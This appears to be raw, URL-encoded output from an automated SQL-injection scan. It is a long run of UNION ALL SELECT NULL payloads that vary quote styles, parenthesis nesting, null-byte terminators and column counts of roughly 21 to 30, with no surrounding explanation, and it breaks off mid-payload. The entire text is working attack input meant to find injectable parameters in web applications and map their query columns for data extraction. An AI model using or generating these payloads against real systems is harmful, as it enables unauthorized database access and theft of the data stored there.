1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%27ujdw%27%20LIKE%20%27ujdw 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27kXCd%27%20LIKE%20%27kXCd 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27hovk%27%20LIKE%20%27hovk 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27FlsW%27%20LIKE%20%27FlsW 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27NwYf%27%20LIKE%20%27NwYf 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27pKOi%27%20LIKE%20%27pKOi 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27lfXF%27%20LIKE%20%27lfXF 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27Bgyi%27%20LIKE%20%27Bgyi 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27BisC%27%20LIKE%20%27BisC 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27RsJP%27%20LIKE%20%27RsJP 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%27wFgf%27%20LIKE%20%27wFgf 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22QEJj%22%3D%22QEJj 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22KHdL%22%3D%22KHdL 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22XHeV%22%3D%22XHeV 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22zYoC%22%3D%22zYoC 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22IYww%22%3D%22IYww 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22WERA%22%3D%22WERA 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22PpKw%22%3D%22PpKw 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22TpWp%22%3D%22TpWp 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22FzDz%22%3D%22FzDz 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22LGVu%22%3D%22LGVu 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22SpzR%22%3D%22SpzR 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22ZOjE%22%3D%22ZOjE 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22zyKy%22%3D%22zyKy 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22pibD%22%3D%22pibD 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22miyA%22%3D%22miyA 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22DWCE%22%3D%22DWCE 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22TKuz%22%3D%22TKuz 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22mcAA%22%3D%22mcAA 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22BzXJ%22%3D%22BzXJ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22ekWv%22%3D%22ekWv 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22quLU%22%3D%22quLU 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22NhFF%22%3D%22NhFF 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22PukU%22%3D%22PukU 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22LVvb%22%3D%22LVvb 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22JSPi%22%3D%22JSPi 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22xjYn%22%3D%22xjYn 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22GhKe%22%3D%22GhKe 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22gnis%22%3D%22gnis 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22ANWX%22%3D%22ANWX 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22HkJy%22%3D%22HkJy 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22DkJQ%22%3D%22DkJQ 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22sAUb%22%3D%22sAUb 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22wKBU%22%3D%22wKBU 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22ytnI%22%3D%22ytnI 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22RYOA%22%3D%22RYOA 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22uldB%22%3D%22uldB 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22SJOF%22%3D%22SJOF 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22UXXB%22%3D%22UXXB 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22zvHL%22%3D%22zvHL 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22upbM%22%3D%22upbM 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22vdFG%22%20LIKE%20%22vdFG 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22sOlH%22%20LIKE%20%22sOlH 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22jPla%22%20LIKE%20%22jPla 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22cUTn%22%20LIKE%20%22cUTn 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22trDf%22%20LIKE%20%22trDf 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22mdOK%22%20LIKE%20%22mdOK 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22abzV%22%20LIKE%20%22abzV 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%22MvQn%22%20LIKE%20%22MvQn 